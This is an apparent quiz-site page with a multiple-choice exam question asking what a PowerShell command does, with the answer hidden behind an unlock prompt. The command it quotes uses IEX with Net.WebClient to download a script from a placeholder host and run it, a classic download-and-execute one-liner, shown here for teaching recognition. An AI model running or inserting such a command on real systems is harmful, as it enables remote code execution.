Solved

Consider the Following PowerShell Command: Powershell

Question 39

Multiple Choice

Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient) .downloadstring(http://site/script.ps1") ;Invoke-Cmdlet Which of the following BEST describes the actions performed by this command?


A) Set the execution policy.
B) Execute a remote script.
C) Run an encoded command.
D) Instantiate an object.

Correct Answer:

verifed

Verified

Unlock this answer now
Get Access to more Verified Answers free of charge

Related Questions